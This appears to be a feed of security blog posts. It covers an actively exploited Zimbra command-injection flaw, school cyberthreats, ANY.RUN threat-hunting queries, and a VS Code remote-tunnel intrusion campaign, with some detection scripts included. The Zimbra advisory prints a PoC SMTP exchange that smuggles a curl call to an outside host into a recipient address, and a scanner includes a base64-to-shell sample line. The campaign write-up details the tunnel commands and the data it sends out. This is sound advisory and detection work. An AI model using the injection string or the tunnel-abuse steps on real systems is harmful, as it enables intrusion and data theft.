Separating the bee from the panda: CeranaKeeper making a beeline for Thailand

ESET Research details the tools and activities of a new China-aligned threat actor, CeranaKeeper, focusing on massive data exfiltration in Southeast Asia

WeLiveSecurity – ​Read More

Zimbra Remote Code Execution Vulnerability Under Active Attack

Key Takeaways


A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.

A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.

The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.

Overview

A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.

The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.

Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.

Patched versions include these versions and newer:


9.0.0 Patch 41

10.0.9

10.1.1

8.8.15 Patch 46

One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.

Technical Analysis

Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.

The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.

The postjournal service was then exploited via port 10027 with the following SMTP commands:

EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.

The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

zmlocalconfig -e postjournal_enabled=true
zmcontrol restart

To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.
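The mynetworks exposure described above can be checked mechanically. The following Python is an added example, not Cyble's or Zimbra's code; it assumes a Postfix-style space-separated mynetworks value (a constructed sample here) plus the server's own public address, and reports any non-loopback entry that would make hosts beyond the server itself trusted clients.

```python
import ipaddress

# Constructed values, not from a real Zimbra host: a Postfix-style mynetworks string and the
# mail server's own public address (203.0.113.0/24 is the TEST-NET-3 documentation range).
EXAMPLE_MYNETWORKS = "127.0.0.0/8 [::1]/128 203.0.113.0/20"
EXAMPLE_PUBLIC_IP = "203.0.113.45"


def parse_mynetworks(value):
    """Turn a space-separated mynetworks value into network objects.
    Postfix writes IPv6 entries in brackets ([::1]/128), so the brackets are stripped.
    Non-CIDR tokens (lookup tables and the like) are skipped."""
    nets = []
    for token in value.split():
        token = token.replace("[", "").replace("]", "")
        try:
            nets.append(ipaddress.ip_network(token, strict=False))
        except ValueError:
            continue
    return nets


def audit_mynetworks(value, public_ip):
    """Return one finding per entry that trusts hosts other than the server itself."""
    findings = []
    addr = ipaddress.ip_address(public_ip)
    for net in parse_mynetworks(value):
        if net.is_loopback:  # the expected default; nothing to report
            continue
        if addr in net:
            # strict=False already widened 203.0.113.0/20 to its real boundary, 203.0.112.0/20
            findings.append(f"{net} covers the server's own public address {public_ip} "
                            f"and {net.num_addresses - 1} other hosts, all trusted as local")
        elif not net.is_private:
            findings.append(f"{net} is a public range trusted as a local network")
    return findings


if __name__ == "__main__":
    for line in audit_mynetworks(EXAMPLE_MYNETWORKS, EXAMPLE_PUBLIC_IP) or ["no findings"]:
        print(line)
```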

Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.

Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).

Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
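Detection logic for the recipient-address abuse described above, as an added example that is not from the Cyble post or from Proofpoint: it scans constructed SMTP and header lines for local parts carrying shell command substitution, ${IFS} expansion, or a base64-decode-to-shell chain, the patterns this post describes. The sample lines and indicator names are assumptions.

```python
import re

# Constructed sample lines modelled on the post's SMTP exchange and the CC-header abuse it
# describes. The base64 blob is a placeholder ("BASE64_PLACEHOLDER"), not a real command.
SAMPLE_LINES = [
    "RCPT TO: <alice@example.com>",
    'RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>',
    'CC: "x$(echo${IFS}QkFTRTY0X1BMQUNFSE9MREVS|base64${IFS}-d|sh)"@mail.domain.com',
    "CC: bob@example.org, carol@example.org",
]

# Either a quoted local part ("...") or a plain one, followed by @domain.
ADDR_RE = re.compile(r'"[^"]*"@[^\s<>,]+|[^\s<>,"]+@[^\s<>,]+')

# Shell constructs that have no business inside a mailbox name.
INDICATORS = {
    "command substitution $(...)": re.compile(r"\$\("),
    "backtick substitution": re.compile(r"`"),
    "variable expansion such as ${IFS}": re.compile(r"\$\{"),
    "base64 decode piped to a shell": re.compile(r"base64.*-d.*\|\s*(ba)?sh\b", re.I),
}


def scan_line(line):
    """Return [(address, [reasons])] for every address on the line that trips an indicator."""
    hits = []
    for addr in ADDR_RE.findall(line):
        reasons = [name for name, rx in INDICATORS.items() if rx.search(addr)]
        if reasons:
            hits.append((addr, reasons))
    return hits


def scan_lines(lines):
    """Scan numbered lines; returns [(line_number, address, [reasons])]."""
    return [(n, addr, reasons)
            for n, line in enumerate(lines, 1)
            for addr, reasons in scan_line(line)]


if __name__ == "__main__":
    for n, addr, reasons in scan_lines(SAMPLE_LINES):
        print(f"line {n}: {addr} -> {', '.join(reasons)}")
```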

Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:

| cveID | vendorProject | product | vulnerabilityName |
|---|---|---|---|
| CVE-2023-37580 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-27926 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-41352 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
| CVE-2022-27925 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
| CVE-2022-37042 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability |
| CVE-2022-27924 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Command Injection Vulnerability |
| CVE-2018-6882 | Zimbra | Collaboration Suite (ZCS) | Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-24682 | Zimbra | Webmail | Zimbra Webmail Cross-Site Scripting Vulnerability |

While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.

Recommendations

All Zimbra administrators should:


Disable postjournal if not needed

Configure mynetworks to prevent unauthorized access

Apply the latest security updates directly from Zimbra

The post Zimbra Remote Code Execution Vulnerability Under Active Attack appeared first on Cyble.

Blog – Cyble – ​Read More

How to protect schools from cyberthreats | Kaspersky official blog

A very troubling trend in recent years has been the rising number of cyberattacks targeting educational institutions. The United States, for instance, has seen school education become one of the most targeted sectors. According to the UK’s Information Commissioner’s Office (ICO), the number of attacks on schools increased by 55% from 2022 to 2023. A similar pattern is emerging globally. Let’s unpick what’s going on here, and look at the ways schools can defend themselves.

Why cybercriminals love school

Several factors contribute to the growing vulnerability of schools, making them attractive targets for cybercriminals:

Dependence on technology. Educational institutions are rapidly becoming digital and are thus reliant on IT infrastructure both in the classroom and in schools’ administration offices. However, their cybersecurity practices are often sadly lacking.
Valuable data. Schools store a wealth of sensitive information, including student and staff data, and financial records. Data breaches can have devastating consequences, and this data is exactly what attackers are after.
Scarce resources. Schools often face tight budgets and a shortage of qualified IT professionals — especially in cybersecurity.
Low user awareness. A great many computer users in schools have little cybersecurity nous. This means they’re susceptible to phishing attacks, malware infections, and other cyberthreats. Often, teachers aren’t much more cyber-savvy.

This all turns educational institutions into sitting ducks. What’s more, successful attacks attract plenty of public attention, which gives cybercriminals leverage — particularly in ransom negotiations following a ransomware attack. The essential nature and social importance of educational institutions also play a significant role.

Sure, if a ransomware attack temporarily shuts a retail chain down, it’s unpleasant — but mostly just for the business itself; customers can generally go elsewhere quite easily. However, if a cyberattack disrupts a school, the consequences are far more serious. Students lose access to education, their academic performance suffers, and parents get landed with arranging childcare and other headaches.

Cyberattacks on educational institutions

Attacks on education are now so common that you don’t have to look far for examples of even large-scale incidents — just look at recent headlines. Not so long ago, a cyberattack targeted Highline Public Schools, a school district in Washington state in the US. The incident forced the district to temporarily close all 34 of its schools — affecting over 17,000 students. All educational activities, including athletics and meetings, were suspended.

In August of this year, the Singapore Ministry of Education announced that an unknown hacker had wiped clean 13,000 iPads and Chromebooks used by students across the country.

In June, the Toronto District School Board, which oversees nearly 600 schools in Canada’s largest city, was hit by a ransomware attack. In May, Western Sydney University, one of Australia’s largest universities with over 35,000 students, reported a hack on its IT infrastructure.

How to protect schools from cyberattacks

With the education sector firmly in the crosshairs of cybercriminals, schools’ IT systems need robust protection.

So how to get it? While large schools, colleges, and universities can allocate substantial budgets for enterprise-grade software and dedicated cybersecurity staff, smaller schools often lack these resources.

As a result, these schools sometimes resort to using security software intended for home use. However, this isn’t ideal. Such products aren’t designed for centralized management, so deploying them across numerous school computers, let alone managing them effectively, can become a major headache.

A far better solution for small schools would be a product designed for small and medium businesses (SMB), such as Kaspersky Small Office Security. Such security software offers all the essential features needed for basic security:

Reliable protection against ransomware and other malware
Automatic backups
Password manager to protect accounts
Vulnerability scanning and much more

Furthermore, SMB security solutions are easy to deploy, and they can operate on an “install and forget” basis — no dedicated IT or security specialist is required for setup and management.

To strengthen school cybersecurity further, we also recommend conducting staff training to raise awareness of cyberthreats. This is easy to set up with our Kaspersky Automated Security Awareness Platform, which helps slash both the time and cost of training.

Kaspersky official blog – ​Read More

TI Lookup: Real-World Use Cases from a Malware Researcher

Editor’s note: The current article is authored by Anna Pham (also known as RussianPanda), a threat intelligence researcher. You can find her latest research and insights on X, LinkedIn, and her blog.

ANY.RUN introduced Threat Intelligence Lookup in February 2024, followed by the YARA Search in April 2024. This article will explore both services and their use cases. 

How Threat Intelligence Lookup Works

Threat Intelligence Lookup allows users to search through the database of sandbox tasks by examining specific details such as:

Processes

Modules

Files

Network and registry activity

All of these are logged by the ANY.RUN sandbox.

The service helps users find critical information like IOCs (Indicators of compromise), events, sandbox reports, and other data corresponding to the search query. 

Figure 1: Main page of Threat Intelligence Lookup service  

The main page of the Threat Intelligence service provides a summary of the most common MITRE techniques used, malware threat statistics, and popular Suricata rules derived from submitted samples, offering valuable insight into current cyber threat trends. 

Figure 2: Threat Intelligence Lookup panel overview 

After navigating to the Lookup section you’ll be able to submit your search query using over 40 different search parameters.

Explore all search parameters available in TI Lookup in the following article. ANY.RUN also offers a comprehensive query guide for the TI Lookup once you’re on the platform. 

Let’s now look into a few use cases with some of TI Lookup’s key search parameters.



Searching for Stealers Reaching out to Telegram  

We can create a query to identify stealers reaching out to Telegram IPs, potentially exfiltrating sensitive data, using the “destinationIpAsn” and “threatName” parameters, as shown below, for the past three months or 180 days. You can also search within 60, 30, 14, 7, 3, or 1-day intervals and bookmark the search query for later use.

Here is the query:

Figure 3: Lookup for stealers reaching out to Telegram and the result overview 

The search results show the associated IPs, Events, Files, Tasks, Synchronization (events and mutexes created), and Network threats.  

Figure 4: Overview of the Files tab 

From the Files tab, users can extract indicators and save them in JSON format.

Figure 5: Static discovering of the PE file 

Note: You can export data from any category, such as IPs, Events, Tasks, etc., in JSON. Additionally, users can view binary characteristics with static analysis or download the binary itself. 

Figure 6: Network threats tab 

We can confirm the exfiltration activity via Telegram within the Network threats tab.



Looking for LummaC2 samples and C2s 

To identify LummaC2 samples and C2 domains, we can use Lumma’s domains that are known to end with “.shop/api” via the following query:

The dollar sign ($) in a search represents the end of a string. When used in a search pattern, it ensures that the search string must match the end of the text being evaluated. So, using $ in the pattern “.shop/api$” ensures that the URL ends exactly with .shop/api and no other characters follow. 

Figure 7: Search results for .shop/api$ 

From the search results, we identified 26 URLs and domains related to LummaC2, which can be exported and operationalized for further monitoring, blocking, or threat hunting within the security infrastructure. 

Figure 8: URLs and Domains findings 

Searching for URLs Used to Retrieve DLL Dependencies and Pivoting on the ASN 

We know that some stealers, such as Vidar Stealer, RecordBreaker (Raccoon Stealer v2), and StealC, use additional DLL dependencies like “softokn3.dll” and “mozglue.dll” to facilitate data exfiltration from browsers, so we can create a query to look for URLs delivering the DLLs: 

Figure 9: The output from running the query that searches for URLs retrieving the DLL dependencies 

From the results below, we can see the processes that initiated the connections to the URLs to retrieve the DLLs, along with the associated URLs, IP addresses, and the countries of origin for those IPs.

Additionally, we identified another pivot point with the ASN “1337team Limited”:

Figure 10: Results from pivoting on 1337team Limited ASN 

Pivoting on the ASN mentioned above revealed more events and IPs, some of which are associated with StealC, Redline, and Amadey activities.  

Searching for Interesting Samples Using MITRE  

Users can search for relevant samples using MITRE techniques or IDs. ANY.RUN provides predefined IDs and their definitions, eliminating the need to search for them elsewhere. 

Figure 11: Predefined MITRE IDs and their definitions 

We can look for phishing samples containing malicious QR codes via the following query, where T1566 is Phishing: 

Figure 12: Results from the search for phishing emails containing the QR code 

Now, we can spice up the query and look for phishing links containing the Cloudflare challenge that is commonly used by Tycoon 2FA and other phishing kits: 

Figure 13: Results from the search for phishing links containing the Cloudflare challenge  

The query can also be adjusted to show the phishing samples with URL submissions only instead of the file attachments using the threatLevel “malicious” to avoid false positives:

Figure 14: Searching for samples containing URLs instead of file attachment submissions 

Searching for samples using CommandLine 

We can search for Latrodectus downloader samples, which are known to drop a copy of themselves under the “%AppData%\Custom_update” path. We can leverage that knowledge to create a query that looks for command lines containing that path:

Figure 15: Results from the query to look for a specific file path within the command line to search for Latrodectus samples 

From the Synchronization tab, we notice the mutex “runnung” being used, so we can also leverage that to look for Latrodectus samples. 

Figure 16: Leveraging the mutex finding to find Latrodectus samples 

We can also leverage CommandLine to look for malicious PowerShell commands, for example when looking for RobotDropper (aka LegionLoader) samples.

So, for the query, we are going to grab a snippet of the base64-encoded command, which partially decodes to “$w=new-object”:

We have 13 samples that match our query, all of which are true positives.  

Figure 17: Results from the query to look for RobotDropper using CommandLine search parameter 
Figure 18: Events tab overview from the search query 



Searching for Gh0stRAT Samples and C2s from a Specific Country  

We can also create a query that searches for Gh0stRAT samples and C2s using “destinationIPgeo” as one of the search parameters; this query looks for Gh0stRAT samples that connect to servers located in China:

Figure 19: Results from the query to look for Gh0stRAT samples that connect to servers based in China 

YARA Search 

In addition to the Threat Intelligence Lookup service, ANY.RUN offers YARA Search, enabling users to scan its database of collected and analyzed threat data using YARA rules, whether imported from the local machine or created on the fly. 

We can create a YARA rule to look for LummaC2 Stealer samples, and in under 10 seconds, we get the results, which is impressively fast. Users can also run multiple YARA scans in separate tabs.  

Figure 20: Results from YARA scan 

You can view the binary’s PE characteristics from the results, download it, and export the results in JSON format. 

Figure 21: Exported JSON results 

Conclusion 

ANY.RUN’s Threat Intelligence Lookup and YARA Search services allow for precise threat hunting and the extraction of valuable insights into current cyber threat trends. What’s impressive is how fast these scans are—they significantly speed up the analysis process, allowing for quick detection of threats and malware. 

ANY.RUN is making it easier for organizations to take a proactive and informed stance on cybersecurity, which is essential in our constantly evolving threat landscape.

Test ANY.RUN’s Threat Intelligence Lookup and YARA Search in a free trial →

The post TI Lookup: Real-World Use Cases from a Malware Researcher appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Why system resilience should mainly be the job of the OS, not just third-party applications

Building efficient recovery options will drive ecosystem resilience

WeLiveSecurity – ​Read More

Silent Intrusion: Unraveling the Sophisticated Attack Leveraging VS Code for Unauthorized Access

Key takeaways


Cyble Research and Intelligence Labs (CRIL) uncovered a sophisticated attack that leverages legitimate tools such as Visual Studio (VS) Code and GitHub.

The Threat Actor (TA) used a .LNK file as the initial attack vector, potentially delivered through spam or phishing emails. The .LNK file is disguised as a legitimate setup file, using an MSI setup icon to deceive users into executing it.

Upon execution, the .LNK file silently downloads a Python distribution package and uses it to run a malicious Python script.

The TA leverages a VScode tool to initiate a Remote Tunnel and retrieve an activation code, which the TA can use to gain unauthorized remote access to the victim’s machine. This enables the TA to interact with the system, access files, and perform additional malicious activities.

To maintain persistence, the TA creates a scheduled task designed to automatically trigger the execution of a malicious Python script with SYSTEM privileges and high priority.

Similar tactics, techniques, and procedures (TTP) were employed by the Chinese APT group, Stately Taurus, in cyber espionage campaigns aimed at organizations throughout Europe and Asia.

Overview

Cyble Research and Intelligence Lab (CRIL) uncovered a campaign that leverages a suspicious .LNK file as the initial attack vector. This file, potentially delivered via spam emails, downloads a Python distribution package that is then used to execute an obfuscated Python script retrieved from a paste site. At the time of publishing this research, this script had no detections on VirusTotal (VT), making it difficult to identify through standard security measures.

Once executed, the Python script establishes persistence by creating a scheduled task with system privileges and high priority. It checks if Visual Studio Code (VSCode) is installed on the victim’s machine. If not, the script downloads the standalone VSCode CLI from a trusted source. Using VSCode, the script creates a remote tunnel, sharing an activation code with the TA, which facilitates unauthorized remote access to the victim’s machine.

The VSCode Remote – Tunnels extension is typically used to connect to a remote machine, such as a desktop PC or virtual machine (VM), via a secure tunnel. This enables users to access the machine from any VSCode client without the need for SSH. However, in this campaign, the TA exploits this feature, using it to establish a remote connection to the victim’s system for malicious purposes.

This attack method mirrors tactics previously observed in campaigns by the Stately Taurus Chinese APT group, as documented by Unit42 researchers. In this blog, we will examine how the TA cleverly uses legitimate tools like VSCode and GitHub to conceal their activity and establish unauthorized remote connections. The figure below illustrates the infection chain.

Technical Analysis

CRIL has identified a campaign involving a suspicious .LNK file masquerading as an installer. When executed, it displays a fake “Successful installation” message in Chinese (“安裝成功“). However, in the background, it silently downloads additional components using the curl utility, including a Python distribution package named “python-3.12.5-embed-amd64.zip”.

The .LNK file then creates a directory at “%LOCALAPPDATA%\Microsoft\Python” and extracts the contents of the zip archive into this location using tar.exe. Afterward, it downloads a malicious script from a paste.ee site via the URL “hxxps[:]//paste[.]ee/r/DQjrd/0” and saves it as “update.py” in the same location. Once the download is complete, “update.py” is executed using “pythonw.exe” without showing a console window. The contents of the LNK file are shown below:

Update.py

The script begins by checking whether Visual Studio Code (VSCode) is already installed on the system. It does this by verifying the existence of the directory located at “%LOCALAPPDATA%\microsoft\VScode”. If this directory is not found, indicating that VSCode is not installed, the script proceeds to download the VSCode Command Line Interface (CLI) from a Microsoft source: “hxxps://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli[.]zip”. Once downloaded, the zip file is extracted, and the executable file “code.exe” is placed into the “%LOCALAPPDATA%\microsoft\VScode” directory.

Persistence

The script then proceeds to create a scheduled task named “MicrosoftHealthcareMonitorNode” to ensure the persistence of its malicious activities. It is designed to execute the “update.py” script using “pythonw.exe,” which runs without showing a console window, allowing the malicious activity to stay hidden. Before creating the task scheduler entry, the script checks if it already exists by running the command “schtasks /query /tn MicrosoftHealthcareMonitorNode” to avoid creating duplicates.

 The configuration of this task varies depending on the user’s privilege level. For non-admin users, the task is set to run every four hours, beginning at 8:00 AM, ensuring that the malicious script is executed at regular intervals. On systems where the user has administrative privileges, the task is configured to trigger at logon, running with elevated SYSTEM privileges and high priority, which grants it more control and less likelihood of being interrupted. The figure below shows the Schedule task entry created by the malware.

Creating Remote Tunnel

The script next checks whether “code.exe” is already running in the background by inspecting the output of the “tasklist” command. If it detects that “code.exe” is not active, it then executes “code.exe” to log out any active remote sessions. This is done by issuing the command “code.exe tunnel user logout,” which ensures the termination of any existing remote tunnels connected to the victim’s system. This step is crucial for the TA, as it allows them to establish a fresh remote tunnel for future interactions with the victim’s system.

After ensuring the existing tunnel is closed, the script initiates a new process using the command:


code.exe --locale en-US tunnel --accept-server-license-terms --name <COMPUTERNAME>

This command initiates a remote tunnel, and the script automatically associates it with a GitHub account for authentication. The output of the “code.exe” command is saved in a file named “output.txt” within the “%localappdata%\microsoft\VSCode” directory. Additionally, the content of “output.txt” is copied to another file named “output2.txt” in the same directory in order to extract the 8-character alphanumeric activation code for the GitHub account.

Following this, the script reads the “output2.txt” file and identifies the GitHub account activation code using the regular expression pattern “and use code (\w{4}-\w{4})”, as shown in the figure below. This extracted code is saved to a variable for later stages of the attack, enabling further malicious activities.

Exfiltration

The TA then gathers the victim’s system information by collecting the names of folders from several directories, including “C:\Program Files,” “C:\Program Files (x86),” “C:\ProgramData,” and “C:\Users.” Additionally, the TA obtains a list of processes currently running on the victim’s machine and sends this information directly to the TA’s command-and-control (C&C) server, “hxxp://requestrepo.com/r/2yxp98b3”, as shown below. RequestRepo.com is primarily a tool for analyzing incoming HTTP and DNS requests. However, the TA has exploited it to capture stolen data transmitted from victim machines.

Furthermore, the TA gathers more sensitive data, such as the system’s language settings, geographical location, computername, username, userdomain, the activation code for the remote tunnel, and details about user privileges. All of this data is base64 encoded to obfuscate it before being sent to the command-and-control (C&C) server via a POST request. The figure below shows the code snippet used by the TA for data exfiltration.

Impact

After the TA receives the exfiltrated data, they can log in using their GitHub account at the URL “hxxps://github.com/login/device”. Here, the TA can enter the exfiltrated alphanumeric activation code to gain unauthorized access to the victim’s machine.

Unauthorized access to the victim’s machine allows the TA to view and manipulate files and directories stored on the victim’s system. The figure below shows how the TA can access the victim’s files through the VSCode tunnel using the stolen activation code.

This degree of access not only enables them to browse through the victims’ files but also enables them to execute commands through the terminal. With this control, the TA can perform a variety of actions, such as installing malware, extracting sensitive information, or altering system settings, potentially leading to further exploitation of the victim’s system and data.

Unit42 researchers explained that the TA can execute several tools, including mimikatz, LaZagne, In-Swor, and Tscan, to perform various malicious activities on the victim’s system.

Conclusion

This campaign demonstrates the growing sophistication of TAs in leveraging legitimate tools like VSCode to establish unauthorized access to victim systems. By utilizing a seemingly harmless .LNK file and an obfuscated Python script, the Threat Actor can effectively bypass detection measures. This access allows them to manipulate files, execute commands, and potentially install additional malware, amplifying the scope for exploitation.

Organizations must maintain a proactive security posture, focusing on vigilance, enhancing existing security practices, and implementing new ones to defend against a constantly evolving threat spectrum. Understanding these tactics is crucial for building a more resilient cybersecurity posture.

Recommendations


Utilize advanced endpoint protection solutions that include behavioral analysis and machine learning capabilities to detect and block suspicious activities, even those involving legitimate applications like VSCode.

Review scheduled tasks on all systems regularly to identify unauthorized or unusual entries. This can help detect persistence mechanisms established by threat actors.

Conduct training sessions to educate users about the risks of opening suspicious files or links, particularly those related to .LNK files and unknown sources.

Limit user permissions to install software, particularly for tools that can be exploited, like VSCode. Implement application whitelisting to control which applications can be installed and run on systems.

Deploy advanced monitoring tools that can detect unusual network traffic, unauthorized access attempts, and abnormal behavior within the system. Regularly audit and review system and application logs to catch early signs of intrusion.
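To put the scheduled-task and monitoring recommendations into practice, here is an added example (not Cyble's code) that triages constructed process-creation records for the behaviours this post describes: an unattended VSCode tunnel, the tunnel logout, a schtasks entry running pythonw.exe, the task name, and pythonw.exe launched from the masquerading Python directory. The event format, sample paths and rule names are assumptions.

```python
import ntpath

# Constructed process-creation records (image path + command line) modelled on the
# behaviour described in this post; they are not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\Users\dev\project'},
    {"image": r"C:\Users\dev\AppData\Local\microsoft\VScode\code.exe",
     "cmdline": "code.exe --locale en-US tunnel --accept-server-license-terms --name WORKSTATION-01"},
    {"image": r"C:\Users\dev\AppData\Local\microsoft\VScode\code.exe",
     "cmdline": "code.exe tunnel user logout"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn MicrosoftHealthcareMonitorNode /tr "pythonw.exe update.py" '
                '/sc hourly /mo 4 /st 08:00'},
    {"image": r"C:\Users\dev\AppData\Local\Microsoft\Python\pythonw.exe",
     "cmdline": "pythonw.exe update.py"},
    {"image": r"C:\Python312\pythonw.exe",
     "cmdline": "pythonw.exe build.py"},
]


def _name(ev):
    """Lower-cased executable name from a Windows image path."""
    return ntpath.basename(ev["image"]).lower()


# Each rule is a predicate over one event. Rule names are assumptions for this example.
RULES = {
    # A tunnel started by the CLI with the flag that suppresses the licence prompt.
    "vscode_tunnel_started": lambda ev: _name(ev) == "code.exe"
        and " tunnel" in ev["cmdline"]
        and "--accept-server-license-terms" in ev["cmdline"],
    # The script logs out existing tunnels before creating its own.
    "vscode_tunnel_logout": lambda ev: _name(ev) == "code.exe"
        and "tunnel user logout" in ev["cmdline"],
    # Persistence: a scheduled task whose action is the console-less Python interpreter.
    "schtasks_runs_pythonw": lambda ev: _name(ev) == "schtasks.exe"
        and "/create" in ev["cmdline"].lower()
        and "pythonw" in ev["cmdline"].lower(),
    # The task name reported in this campaign, whether being created or queried.
    "known_task_name": lambda ev: "microsofthealthcaremonitornode" in ev["cmdline"].lower(),
    # pythonw.exe running from the directory that masquerades as a Microsoft component.
    "pythonw_in_localappdata": lambda ev: _name(ev) == "pythonw.exe"
        and "\\appdata\\local\\microsoft\\python\\" in ev["image"].lower(),
}


def triage(events):
    """Return [(event_index, [matching rule names])] for events matching at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = [name for name, rule in RULES.items() if rule(ev)]
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']} -> {', '.join(hits)}")
```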

MITRE ATT&CK® Techniques

| Tactic | Technique | Procedure |
|---|---|---|
| Execution (TA0002) | Command and Scripting Interpreter: Python (T1059.006) | Update.py is downloaded and executed by the shortcut file |
| Persistence (TA0003) | Scheduled Task/Job: Scheduled Task (T1053.005) | “MicrosoftHealthcareMonitorNode” scheduled task is created for non-admin users |
| Privilege Escalation (TA0004) | Scheduled Task/Job: Scheduled Task (T1053.005) | “MicrosoftHealthcareMonitorNode” scheduled task is created for admin users with SYSTEM privilege |
| Defense Evasion (TA0005) | Masquerading: Match Legitimate Name or Location (T1036.005) | Creates a “%localappdata%/Microsoft/Python” directory |
| Discovery (TA0007) | System Information Discovery (T1082) | Collects the system’s language settings, geographical location, computername, username, and userdomain |
| Discovery (TA0007) | File and Directory Discovery (T1420) | Collects folder names present in the Program Files and ProgramData directories |
| Discovery (TA0007) | Process Discovery (T1057) | “tasklist” command is used to gather a list of currently running processes |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | The VSCode tunnel feature is used to access the victim’s system |

Indicators Of Compromise

| Indicators | Indicator Type | Description |
|---|---|---|
| 281766109f2375a01bad80478fd18841eccaefc1ee9277179cc7ff075d1beae2 | SHA-256 | Shortcut file |
| c7f07bdfb91653f53782885a3685436e2e965e1c5f4863c03f5a9825c0364489 | SHA-256 | update.py |
| hxxp://requestrepo.com/r/2yxp98b3 | C&C | POST request sent to this URL |
| hxxps://paste[.]ee/r/DQjrd/0 | URL | Downloads update.py |

The post Silent Intrusion: Unraveling the Sophisticated Attack Leveraging VS Code for Unauthorized Access appeared first on Cyble.

Blog – Cyble – ​Read More

How to Collect Indicators of Compromise in the ANY.RUN Sandbox

Gathering Indicators of Compromise (IOCs) is key to identifying and responding to threats. IOCs are pieces of forensic data that point to potential malicious activity, helping you detect, investigate, and prevent cyberattacks.

With ANY.RUN, you can collect a wide variety of IOCs, giving you a complete picture of any threat. 

Let’s dive into the types of IOCs you can collect in ANY.RUN’s Interactive Sandbox and where to find them. 

File System Indicators 

Main Objects 

The Main Object is one of the most critical components when analyzing malware inside the ANY.RUN sandbox. This refers to the primary file that was loaded for analysis. 

Once you’ve initiated a sandbox analysis session, simply click on the file name located in the upper-right corner of the screen.  

File name displayed inside ANY.RUN sandbox 

This action will give you quick access to the Main Object IOCs, which include basic details such as file paths, hashes, and more.  

Main Objects IOCs inside ANY.RUN sandbox analysis


Dropped Executable Files 

All files dropped during the malware’s execution are shown in the bottom panel under Files. This area demonstrates exactly what files the malware generated or modified, helping you track its propagation across the system. 

Dropped executable files inside ANY.RUN

Network Indicators 

Domains (DNS Requests) 

Domains that the malware attempts to access can help you trace its communication with external servers, such as command-and-control (C2) infrastructure.  

You can find these IOCs under Network → DNS Requests in the bottom panel of the sandbox interface.  

By analyzing the DNS requests, you’ll get a clearer view of how the malware interacts with remote hosts, often revealing malicious infrastructure or other indicators that can assist in further threat investigation. 

DNS requests inside ANY.RUN sandbox

Connections 

The malware’s active connections can be observed under Network → Connections.  

This feature allows you to monitor the malware’s communication channels, tracking its interactions with command-and-control (C2) servers or other suspicious IP addresses.  

Analyzing these connections enables you to identify data exfiltration routes or pinpoint where the malware is sending information. 

Connections in ANY.RUN sandbox analysis 

HTTP/HTTPS Requests 

HTTP and HTTPS requests initiated by the malware are logged under Network → HTTP Requests. This is crucial for identifying malicious websites or external servers the malware connects to.

HTTP requests displayed in ANY.RUN

Malware Configurations

In the ANY.RUN sandbox, you can gather IOCs specifically associated with malware configurations by clicking the MalConf button located in the upper right corner of the screen.

MalConf button inside ANY.RUN sandbox 

The feature pulls IOCs directly from the malware’s configuration, such as URLs, file hashes, and domains, providing key insights for further in-depth investigation and reporting.

Malware configurations inside ANY.RUN sandbox session


